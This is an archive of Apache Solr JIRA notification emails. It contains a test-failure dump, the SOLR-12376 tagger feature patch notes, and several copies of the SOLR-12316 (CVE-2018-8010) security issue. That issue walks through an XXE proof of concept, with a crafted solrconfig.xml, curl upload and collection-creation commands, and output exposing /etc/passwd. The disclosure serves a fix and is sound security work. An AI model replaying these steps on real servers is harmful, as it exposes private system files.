"core":"testSplitIntegration_collection_shard2_replica_n3",   
"leader":"true",   "SEARCHER.searcher.maxDoc":11,   
"SEARCHER.searcher.deletedDocs":0,   "INDEX.sizeInBytes":1,   
"node_name":"127.0.0.1:1_solr",   "state":"active",   
"type":"NRT",   "SEARCHER.searcher.numDocs":11}, "core_node4":{ 
  "core":"testSplitIntegration_collection_shard2_replica_n4",   
"SEARCHER.searcher.maxDoc":11,   "SEARCHER.searcher.deletedDocs":0, 
  "INDEX.sizeInBytes":1,   "node_name":"127.0.0.1:10001_solr",  
 "state":"active",   "type":"NRT",   
"SEARCHER.searcher.numDocs":11}},   "range":"0-7fff",   
"state":"active"}, "shard1":{   "stateTimestamp":"1526912528747245150", 
  "replicas":{ "core_node1":{   
"core":"testSplitIntegration_collection_shard1_replica_n1",   
"leader":"true",   "SEARCHER.searcher.maxDoc":14,   
"SEARCHER.searcher.deletedDocs":0,   "INDEX.sizeInBytes":1,   
"node_name":"127.0.0.1:1_solr",   "state":"active",   
"type":"NRT",   "SEARCHER.searcher.numDocs":14}, "core_node2":{ 
  "core":"testSplitIntegration_collection_shard1_replica_n2",   
"SEARCHER.searcher.maxDoc":14,   "SEARCHER.searcher.deletedDocs":0, 
  "INDEX.sizeInBytes":1,   "node_name":"127.0.0.1:10001_solr",  
 "state":"active",   "type":"NRT",   
"SEARCHER.searcher.numDocs":14}},   "range":"8000-",   
"state":"inactive"}, "shard1_1":{   "parent":"shard1",   
"stateTimestamp":"1526912528767921700",   "range":"c000-",  
 "state":"active",   "replicas":{ "core_node10":{   
"leader":"true",   
"core":"testSplitIntegration_collection_shard1_1_replica1",   
"SEARCHER.searcher.maxDoc":7,   "SEARCHER.searcher.deletedDocs":0,  
 "INDEX.sizeInBytes":1,   "node_name":"127.0.0.1:1_solr",   
"base_url":"http://127.0.0.1:1/solr";,   "state":"active",   
"type":"NRT",   "SEARCHER.searcher.numDocs":7}, 
"core_node9":{   
"core":"testSplitIntegration_collection_shard1_1_replica0",   
"SEARCHER.searcher.maxDoc":7,   "SEARCHER.searcher.deletedDocs":0,  
 "INDEX.sizeInBytes":1,   "node_name":"127.0.0.1:10001_solr",   
"base_url":"http://127.0.0.1:10001/solr";,   "state":"active",   
"type":"NRT",   "SEARCHER.searcher.numDocs":7}}}, "shard1_0":{  
 "parent":"shard1",   "stateTimestamp":"1526912528767525050",   
"range":"8000-bfff",   "state":"active",   "replicas":{ 
"core_node7":{   "leader":"true",   
"core":"testSplitIntegration_collection_shard1_0_replica0",   
"SEARCHER.searcher.maxDoc":7,   "SEARCHER.searcher.deletedDocs":0,  
 "INDEX.sizeInBytes":1,   "node_name":"127.0.0.1:10001_solr",   
"base_url":"http://127.0.0.1:10001/solr";,   "state":"active",   
"type":"NRT",   "SEARCHER.searcher.numDocs":7}, 
"core_node8":{   
"core":"testSplitIntegration_collection_shard1_0_replica1",   
"SEARCHER.searcher.maxDoc":7,   "SEARCHER.searcher.deletedDocs":0,  
 "INDEX.sizeInBytes":1,   "node_name":"127.0.0.1:1_solr",   
"base_url":"http://127.0.0.1:1/solr";,   "state":"active",   
"type":"NRT",   "SEARCHER.searcher.numDocs":7}

Stack Trace:
java.util.concurrent.TimeoutException: last state: 
DocCollection(testSplitIntegration_collection//clusterstate.json/39)={
  "replicationFactor":"2",
  "pullReplicas":"0",
  "router":{"name":"compositeId"},
  "maxShardsPerNode":"2",
  "autoAddReplicas":"false",
  "nrtReplicas":"2",
  "tlogReplicas":"0",
  "autoCreated":"true",
  "shards":{
"shard2":{
  "replicas":{
"core_node3":{
  "core":"testSplitIntegration_collection_shard2_replica_n3",
  "leader":"true",
  "SEARCHER.searcher.maxDoc":11,
  "SEARCHER.searcher.deletedDocs":0,
  "INDEX.sizeInBytes":1,
  "node_name":"127.0.0.1:1_solr",
  "state"

[jira] [Commented] (SOLR-12316) CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)

2018-05-21 Thread Noble Paul (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12316?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482538#comment-16482538
 ] 

Noble Paul commented on SOLR-12316:
---

[~ichattopadhyaya]

 

Just to clarify. Didn't we disable resolving external file reference if the 
configset is loaded using the REST API ?

> CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)
> -
>
> Key: SOLR-12316
> URL: https://issues.apache.org/jira/browse/SOLR-12316
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: config-api, Schema and Analysis, Server
>Affects Versions: 5.5.5, 6.6.3, 7.3
>Reporter: Ishan Chattopadhyaya
>Assignee: Uwe Schindler
>Priority: Blocker
>  Labels: security
> Fix For: 6.6.4, 7.4, master (8.0), 7.3.1
>
> Attachments: SOLR-12316-testfix.patch, SOLR-12316.patch, 
> SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, 
> solr.log
>
>
> While trying to work around the issue of being unable to upload large files 
> to ZK (without jute.maxbuffer setting), [~antz] brought to my notice that he 
> was able to successfully achieve that using XXE. That alarmed me! Our 
> managed-schema and solrconfig.xml parse XXEs!
> Here's a very nasty attack I could execute using this and configset upload 
> functionality:
> Step 1: Create a configset with just two files in a directory called 
> "minimal":
> schema.xml:
> {code}
> 
>   
>   
> 
> {code}
> solrconfig.xml
> {code}
> 
>  
> ]>
> 
>   ${solr.data.dir:}
>
> class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/>
>   
>   7.3.0
>   
> 
>   ${solr.commitwithin.softcommit:true}
> 
>   
>   
> 
>   explicit
>   true
>   text
>   &passwdFile;
> 
>   
> 
> {code}
> Step 2: Upload the minimal directory to Solr using configset upload API:
> {code}
> [ishan@x260 solr] $ (cd minimal && zip -r - *) | curl -X POST --header 
> "Content-Type:application/octet-stream" --data-binary @- 
> "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=mybadconfigset";
>   adding: schema.xml (deflated 42%)
>   adding: solrconfig.xml (deflated 50%)
> {
>   "responseHeader":{
> "status":0,
> "QTime":23}}
> {code}
> Step 3: Create a collection using this configset
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/admin/collections?action=CREATE&name=mybadcoll&numShards=1&collection.configName=mybadconfigset";
> {
>   "responseHeader":{
> "status":0,
> "QTime":3431},
>   "success":{
> "192.168.1.6:8983_solr":{
>   "responseHeader":{
> "status":0,
> "QTime":2062},
>   "core":"mybadcoll_shard1_replica_n1"}}}
> {code}
> Step 4: Use Config API to check the select handler's config. The file is 
> revealed!
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/mybadcoll/config/requestHandler";|jq
>   % Total% Received % Xferd  Average Speed   TimeTime Time  
> Current
>  Dload  Upload   Total   SpentLeft  Speed
> 100  7939  100  79390 0   7939  0  0:00:01 --:--:--  0:00:01  323k
> {
>   "responseHeader": {
> "status": 0,
> "QTime": 16
>   },
>   "config": {
> "requestHandler": {
>   "/select": {
> "name": "/select",
> "class": "solr.SearchHandler",
> "defaults": {
>   "echoParams": "explicit",
>   "indent": "true",
>   "df": "text",
>   "password": 
> "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\nftp:x:14:50:FTP
>  
> User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\nsystemd-timesync:x:999:998:systemd
>  Time Synchronization:/:/sbin/nologin\nsystemd-network:x:192:192:systemd 
> Network Management:/:/sbin/nologin\nsystemd-resolve:x:193:193:systemd 
> Resolver:/:/sbin/nologin\ndbus:x:81:81:System message 
> bus:/:/sbin/nologin\npolkitd:x:998:997:User for 
> polkitd:/:/sbin/nologin\ngeoclue:x:997:996:User for 
> geoclue:/var/lib/geoclue:/sbin/nologin\nrtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin\npulse:x:171:171:PulseAudio
>  System Daemon:/var/run/pulse:/sbin/nologin\navahi:x:70:70:Avahi mDNS/DNS-SD 
> Stack:/var/run/avahi-daemon:/sbin/nologin\nchrony:x:996:992::/var/lib/chrony:/sbin/nologin\nrpc:x:32:32:Rpcbind
>  Daemon:/var/lib/rpcb

[jira] [Commented] (SOLR-12376) New TaggerRequestHandler (aka SolrTextTagger)

2018-05-21 Thread David Smiley (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12376?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482529#comment-16482529
 ] 

David Smiley commented on SOLR-12376:
-

Patch:
* Copied into new package org.apache.solr.handler.tagger
* The source headers are retained from OpenSextant.  NOTICE.txt updated with 
legal mumbo-jumbo.  BTW IntelliJ annoyingly replaced the headers with the ASF 
one when I copied the files between projects (!) so I manually updated each 
one.  It didn't seem to honor the copyright feature settings to not update 
existing copyrights, at least not in this scenario.  Ugh.
* Removed the htmlOffsetAdjust option with supporting class & test.  I altered 
TaggerRequestHandler accordingly but made it possible via sub-class extension 
so that it could be added externally (though the change for this is a little 
clumsy).  I don't want to add additional dependencies (Jericho HTML Parser, 
ASLv2 licensed), _at least not at this time_.  And in retrospect I've wondered 
if the underlying feature here could be accomplished in a better way.
** Note that the xmlOffsetAdjust expressly depends on Woodstox, which is 
already included with Solr.
* Removed @author tags
* Copied the test config into test collection1 as solrconfig-tagger.xml and 
schema-tagger.xml
** Replaced the OpenSextant fully qualified package name of the handler with 
"solr.TaggerRequestHandler".
*** modified SolrResourceLoader.packages to include "handler.tagger." due to 
the sub-package
** Replaced the OpenSextant package name of the ConcatenateFilter to 
"solr.ConcatenateFilter" which now works.  (we depend on LUCENE-8323)
** Merged the TaggingAttribute test config into this config since it was easy 
to do and avoids bloating with yet another config
* Removed legacy support of configuration which allowed top level settings in 
the request handler as implied invariants.

TODO docs

> New TaggerRequestHandler (aka SolrTextTagger)
> -
>
> Key: SOLR-12376
> URL: https://issues.apache.org/jira/browse/SOLR-12376
> Project: Solr
>  Issue Type: New Feature
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: David Smiley
>Assignee: David Smiley
>Priority: Major
> Fix For: 7.4
>
> Attachments: SOLR-12376.patch
>
>
> This issue introduces a new RequestHandler: {{TaggerRequestHandler}}, AKA the 
> SolrTextTagger from the OpenSextant project 
> [https://github.com/OpenSextant/SolrTextTagger]. It's used for named entity 
> recognition (NER) of text past to it. It doesn't do any NLP (outside of 
> Lucene text analysis) so it's said to be a "naive tagger", but it's 
> definitely useful as-is and a more complete NER or ERD (entity recognition 
> and disambiguation) system can be built with this as a key component. The 
> SolrTextTagger has been used on queries for query-understanding, and it's 
> been used on full-text, and it's been used on dictionaries that number tens 
> of millions in size. Since it's small and has been used a bunch (including 
> helping win an ERD competition and in [Apache 
> Stanbol|https://stanbol.apache.org/]), several people have asked me when or 
> why isn't this in Solr yet. So here it is.
> To use it, first you need a collection of documents that have a name-like 
> field (short text) indexed with the ConcatenateFilter (LUCENE-8323) at the 
> end. We call this the dictionary. Once that's in place, you simply post text 
> to a {{TaggerRequestHandler}} and it returns the offset pairs into that text 
> for matches in the dictionary along with the uniqueKey of the matching 
> documents. It can also return other document data desired. That's the gist; 
> I'll add more details on use to the Solr Reference Guide.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Updated] (SOLR-12376) New TaggerRequestHandler (aka SolrTextTagger)

2018-05-21 Thread David Smiley (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12376?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

David Smiley updated SOLR-12376:

Attachment: SOLR-12376.patch

> New TaggerRequestHandler (aka SolrTextTagger)
> -
>
> Key: SOLR-12376
> URL: https://issues.apache.org/jira/browse/SOLR-12376
> Project: Solr
>  Issue Type: New Feature
>  Security Level: Public(Default Security Level. Issues are Public) 
>Reporter: David Smiley
>Assignee: David Smiley
>Priority: Major
> Fix For: 7.4
>
> Attachments: SOLR-12376.patch
>
>
> This issue introduces a new RequestHandler: {{TaggerRequestHandler}}, AKA the 
> SolrTextTagger from the OpenSextant project 
> [https://github.com/OpenSextant/SolrTextTagger]. It's used for named entity 
> recognition (NER) of text past to it. It doesn't do any NLP (outside of 
> Lucene text analysis) so it's said to be a "naive tagger", but it's 
> definitely useful as-is and a more complete NER or ERD (entity recognition 
> and disambiguation) system can be built with this as a key component. The 
> SolrTextTagger has been used on queries for query-understanding, and it's 
> been used on full-text, and it's been used on dictionaries that number tens 
> of millions in size. Since it's small and has been used a bunch (including 
> helping win an ERD competition and in [Apache 
> Stanbol|https://stanbol.apache.org/]), several people have asked me when or 
> why isn't this in Solr yet. So here it is.
> To use it, first you need a collection of documents that have a name-like 
> field (short text) indexed with the ConcatenateFilter (LUCENE-8323) at the 
> end. We call this the dictionary. Once that's in place, you simply post text 
> to a {{TaggerRequestHandler}} and it returns the offset pairs into that text 
> for matches in the dictionary along with the uniqueKey of the matching 
> documents. It can also return other document data desired. That's the gist; 
> I'll add more details on use to the Solr Reference Guide.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)

-
To unsubscribe, e-mail: dev-unsubscr...@lucene.apache.org
For additional commands, e-mail: dev-h...@lucene.apache.org



[jira] [Updated] (SOLR-12316) CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)

2018-05-21 Thread Uwe Schindler (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12316?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Uwe Schindler updated SOLR-12316:
-
Component/s: Server
 Schema and Analysis
 config-api

> CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)
> -
>
> Key: SOLR-12316
> URL: https://issues.apache.org/jira/browse/SOLR-12316
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: config-api, Schema and Analysis, Server
>Affects Versions: 5.5.5, 6.6.3, 7.3
>Reporter: Ishan Chattopadhyaya
>Assignee: Uwe Schindler
>Priority: Blocker
>  Labels: security
> Fix For: 6.6.4, 7.4, master (8.0), 7.3.1
>
> Attachments: SOLR-12316-testfix.patch, SOLR-12316.patch, 
> SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, 
> solr.log
>
>
> While trying to work around the issue of being unable to upload large files 
> to ZK (without jute.maxbuffer setting), [~antz] brought to my notice that he 
> was able to successfully achieve that using XXE. That alarmed me! Our 
> managed-schema and solrconfig.xml parse XXEs!
> Here's a very nasty attack I could execute using this and configset upload 
> functionality:
> Step 1: Create a configset with just two files in a directory called 
> "minimal":
> schema.xml:
> {code}
> 
>   
>   
> 
> {code}
> solrconfig.xml
> {code}
> 
>  
> ]>
> 
>   ${solr.data.dir:}
>
> class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/>
>   
>   7.3.0
>   
> 
>   ${solr.commitwithin.softcommit:true}
> 
>   
>   
> 
>   explicit
>   true
>   text
>   &passwdFile;
> 
>   
> 
> {code}
> Step 2: Upload the minimal directory to Solr using configset upload API:
> {code}
> [ishan@x260 solr] $ (cd minimal && zip -r - *) | curl -X POST --header 
> "Content-Type:application/octet-stream" --data-binary @- 
> "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=mybadconfigset";
>   adding: schema.xml (deflated 42%)
>   adding: solrconfig.xml (deflated 50%)
> {
>   "responseHeader":{
> "status":0,
> "QTime":23}}
> {code}
> Step 3: Create a collection using this configset
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/admin/collections?action=CREATE&name=mybadcoll&numShards=1&collection.configName=mybadconfigset";
> {
>   "responseHeader":{
> "status":0,
> "QTime":3431},
>   "success":{
> "192.168.1.6:8983_solr":{
>   "responseHeader":{
> "status":0,
> "QTime":2062},
>   "core":"mybadcoll_shard1_replica_n1"}}}
> {code}
> Step 4: Use Config API to check the select handler's config. The file is 
> revealed!
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/mybadcoll/config/requestHandler";|jq
>   % Total% Received % Xferd  Average Speed   TimeTime Time  
> Current
>  Dload  Upload   Total   SpentLeft  Speed
> 100  7939  100  79390 0   7939  0  0:00:01 --:--:--  0:00:01  323k
> {
>   "responseHeader": {
> "status": 0,
> "QTime": 16
>   },
>   "config": {
> "requestHandler": {
>   "/select": {
> "name": "/select",
> "class": "solr.SearchHandler",
> "defaults": {
>   "echoParams": "explicit",
>   "indent": "true",
>   "df": "text",
>   "password": 
> "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\nftp:x:14:50:FTP
>  
> User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\nsystemd-timesync:x:999:998:systemd
>  Time Synchronization:/:/sbin/nologin\nsystemd-network:x:192:192:systemd 
> Network Management:/:/sbin/nologin\nsystemd-resolve:x:193:193:systemd 
> Resolver:/:/sbin/nologin\ndbus:x:81:81:System message 
> bus:/:/sbin/nologin\npolkitd:x:998:997:User for 
> polkitd:/:/sbin/nologin\ngeoclue:x:997:996:User for 
> geoclue:/var/lib/geoclue:/sbin/nologin\nrtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin\npulse:x:171:171:PulseAudio
>  System Daemon:/var/run/pulse:/sbin/nologin\navahi:x:70:70:Avahi mDNS/DNS-SD 
> Stack:/var/run/avahi-daemon:/sbin/nologin\nchrony:x:996:992::/var/lib/chrony:/sbin/nologin\nrpc:x:32:32:Rpcbind
>  Daemon:/var/lib/rpcbind:/sbin/nologin\nusbmuxd:x:113:113:usbmuxd 
> user:/:/sbin/nologin\nradvd:x:75:75:radvd 
> user:/:/sbi

[jira] [Updated] (SOLR-12316) CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)

2018-05-21 Thread Uwe Schindler (JIRA)

 [ 
https://issues.apache.org/jira/browse/SOLR-12316?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Uwe Schindler updated SOLR-12316:
-
Labels: security  (was: )

> CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)
> -
>
> Key: SOLR-12316
> URL: https://issues.apache.org/jira/browse/SOLR-12316
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>  Components: config-api, Schema and Analysis, Server
>Affects Versions: 5.5.5, 6.6.3, 7.3
>Reporter: Ishan Chattopadhyaya
>Assignee: Uwe Schindler
>Priority: Blocker
>  Labels: security
> Fix For: 6.6.4, 7.4, master (8.0), 7.3.1
>
> Attachments: SOLR-12316-testfix.patch, SOLR-12316.patch, 
> SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, 
> solr.log
>
>
> While trying to work around the issue of being unable to upload large files 
> to ZK (without jute.maxbuffer setting), [~antz] brought to my notice that he 
> was able to successfully achieve that using XXE. That alarmed me! Our 
> managed-schema and solrconfig.xml parse XXEs!
> Here's a very nasty attack I could execute using this and configset upload 
> functionality:
> Step 1: Create a configset with just two files in a directory called 
> "minimal":
> schema.xml:
> {code}
> 
>   
>   
> 
> {code}
> solrconfig.xml
> {code}
> 
>  
> ]>
> 
>   ${solr.data.dir:}
>
> class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/>
>   
>   7.3.0
>   
> 
>   ${solr.commitwithin.softcommit:true}
> 
>   
>   
> 
>   explicit
>   true
>   text
>   &passwdFile;
> 
>   
> 
> {code}
> Step 2: Upload the minimal directory to Solr using configset upload API:
> {code}
> [ishan@x260 solr] $ (cd minimal && zip -r - *) | curl -X POST --header 
> "Content-Type:application/octet-stream" --data-binary @- 
> "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=mybadconfigset";
>   adding: schema.xml (deflated 42%)
>   adding: solrconfig.xml (deflated 50%)
> {
>   "responseHeader":{
> "status":0,
> "QTime":23}}
> {code}
> Step 3: Create a collection using this configset
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/admin/collections?action=CREATE&name=mybadcoll&numShards=1&collection.configName=mybadconfigset";
> {
>   "responseHeader":{
> "status":0,
> "QTime":3431},
>   "success":{
> "192.168.1.6:8983_solr":{
>   "responseHeader":{
> "status":0,
> "QTime":2062},
>   "core":"mybadcoll_shard1_replica_n1"}}}
> {code}
> Step 4: Use Config API to check the select handler's config. The file is 
> revealed!
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/mybadcoll/config/requestHandler";|jq
>   % Total% Received % Xferd  Average Speed   TimeTime Time  
> Current
>  Dload  Upload   Total   SpentLeft  Speed
> 100  7939  100  79390 0   7939  0  0:00:01 --:--:--  0:00:01  323k
> {
>   "responseHeader": {
> "status": 0,
> "QTime": 16
>   },
>   "config": {
> "requestHandler": {
>   "/select": {
> "name": "/select",
> "class": "solr.SearchHandler",
> "defaults": {
>   "echoParams": "explicit",
>   "indent": "true",
>   "df": "text",
>   "password": 
> "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\nftp:x:14:50:FTP
>  
> User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\nsystemd-timesync:x:999:998:systemd
>  Time Synchronization:/:/sbin/nologin\nsystemd-network:x:192:192:systemd 
> Network Management:/:/sbin/nologin\nsystemd-resolve:x:193:193:systemd 
> Resolver:/:/sbin/nologin\ndbus:x:81:81:System message 
> bus:/:/sbin/nologin\npolkitd:x:998:997:User for 
> polkitd:/:/sbin/nologin\ngeoclue:x:997:996:User for 
> geoclue:/var/lib/geoclue:/sbin/nologin\nrtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin\npulse:x:171:171:PulseAudio
>  System Daemon:/var/run/pulse:/sbin/nologin\navahi:x:70:70:Avahi mDNS/DNS-SD 
> Stack:/var/run/avahi-daemon:/sbin/nologin\nchrony:x:996:992::/var/lib/chrony:/sbin/nologin\nrpc:x:32:32:Rpcbind
>  Daemon:/var/lib/rpcbind:/sbin/nologin\nusbmuxd:x:113:113:usbmuxd 
> user:/:/sbin/nologin\nradvd:x:75:75:radvd 
> user:/:/sbin/nologin\nqemu:x:107:107:qemu 
> user:/:/sbin/nologin\napa

[jira] [Commented] (SOLR-12316) CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12316?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482430#comment-16482430
 ] 

ASF subversion and git services commented on SOLR-12316:


Commit 3940e6a930bbf245b23a728d1917f850c9f6ae3e in lucene-solr's branch 
refs/heads/branch_6_6 from [~thetaphi]
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=3940e6a ]

SOLR-12316: Make CVE public

# Conflicts:
#   solr/CHANGES.txt

# Conflicts:
#   solr/CHANGES.txt


> CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)
> -
>
> Key: SOLR-12316
> URL: https://issues.apache.org/jira/browse/SOLR-12316
> Project: Solr
>  Issue Type: Bug
>  Security Level: Public(Default Security Level. Issues are Public) 
>Affects Versions: 5.5.5, 6.6.3, 7.3
>Reporter: Ishan Chattopadhyaya
>Assignee: Uwe Schindler
>Priority: Blocker
> Fix For: 6.6.4, 7.4, master (8.0), 7.3.1
>
> Attachments: SOLR-12316-testfix.patch, SOLR-12316.patch, 
> SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, SOLR-12316.patch, 
> solr.log
>
>
> While trying to work around the issue of being unable to upload large files 
> to ZK (without jute.maxbuffer setting), [~antz] brought to my notice that he 
> was able to successfully achieve that using XXE. That alarmed me! Our 
> managed-schema and solrconfig.xml parse XXEs!
> Here's a very nasty attack I could execute using this and configset upload 
> functionality:
> Step 1: Create a configset with just two files in a directory called 
> "minimal":
> schema.xml:
> {code}
> 
>   
>   
> 
> {code}
> solrconfig.xml
> {code}
> 
>  
> ]>
> 
>   ${solr.data.dir:}
>
> class="${solr.directoryFactory:solr.NRTCachingDirectoryFactory}"/>
>   
>   7.3.0
>   
> 
>   ${solr.commitwithin.softcommit:true}
> 
>   
>   
> 
>   explicit
>   true
>   text
>   &passwdFile;
> 
>   
> 
> {code}
> Step 2: Upload the minimal directory to Solr using configset upload API:
> {code}
> [ishan@x260 solr] $ (cd minimal && zip -r - *) | curl -X POST --header 
> "Content-Type:application/octet-stream" --data-binary @- 
> "http://localhost:8983/solr/admin/configs?action=UPLOAD&name=mybadconfigset";
>   adding: schema.xml (deflated 42%)
>   adding: solrconfig.xml (deflated 50%)
> {
>   "responseHeader":{
> "status":0,
> "QTime":23}}
> {code}
> Step 3: Create a collection using this configset
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/admin/collections?action=CREATE&name=mybadcoll&numShards=1&collection.configName=mybadconfigset";
> {
>   "responseHeader":{
> "status":0,
> "QTime":3431},
>   "success":{
> "192.168.1.6:8983_solr":{
>   "responseHeader":{
> "status":0,
> "QTime":2062},
>   "core":"mybadcoll_shard1_replica_n1"}}}
> {code}
> Step 4: Use Config API to check the select handler's config. The file is 
> revealed!
> {code}
> [ishan@x260 solr] $ curl 
> "http://localhost:8983/solr/mybadcoll/config/requestHandler";|jq
>   % Total% Received % Xferd  Average Speed   TimeTime Time  
> Current
>  Dload  Upload   Total   SpentLeft  Speed
> 100  7939  100  79390 0   7939  0  0:00:01 --:--:--  0:00:01  323k
> {
>   "responseHeader": {
> "status": 0,
> "QTime": 16
>   },
>   "config": {
> "requestHandler": {
>   "/select": {
> "name": "/select",
> "class": "solr.SearchHandler",
> "defaults": {
>   "echoParams": "explicit",
>   "indent": "true",
>   "df": "text",
>   "password": 
> "root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:/sbin/nologin\noperator:x:11:0:operator:/root:/sbin/nologin\ngames:x:12:100:games:/usr/games:/sbin/nologin\nftp:x:14:50:FTP
>  
> User:/var/ftp:/sbin/nologin\nnobody:x:99:99:Nobody:/:/sbin/nologin\nsystemd-timesync:x:999:998:systemd
>  Time Synchronization:/:/sbin/nologin\nsystemd-network:x:192:192:systemd 
> Network Management:/:/sbin/nologin\nsystemd-resolve:x:193:193:systemd 
> Resolver:/:/sbin/nologin\ndbus:x:81:81:System message 
> bus:/:/sbin/nologin\npolkitd:x:998:997:User for 
> polkitd:/:/sbin/nologin\ngeoclue:x:997:996:User for 
> geoclue:/var/lib/geoclue:/sbin/nologin\nrtkit:x:172:172:RealtimeKit:/proc:/sbin/nologin\npulse:x:171:171:PulseAudio
>  System Daemon:/var/run/pulse:/sbin/nologin\navahi:x:70:70:Avahi mDNS/DNS-SD 
> Stack:/var/run/avahi-daemon:/sbin/nol

[jira] [Commented] (SOLR-12316) CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)

2018-05-21 Thread ASF subversion and git services (JIRA)

[ 
https://issues.apache.org/jira/browse/SOLR-12316?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16482428#comment-16482428
 ] 

ASF subversion and git services commented on SOLR-12316:


Commit 6bb88bb2861e2fb512d1da9831afbc29acba7a1b in lucene-solr's branch 
refs/heads/branch_7_3 from [~thetaphi]
[ https://git-wip-us.apache.org/repos/asf?p=lucene-solr.git;h=6bb88bb ]

SOLR-12316: Make CVE public

# Conflicts:
#   solr/CHANGES.txt


> CVE-2018-8010: Prevent XXE in solrconfig.xml and managed-schema(.xml)
> -
>
> Key: SOLR-12316
> URL: https://issues.apache.org/jira/browse/SOLR-12316
> Project: Solr
>  Issue Type: Bug
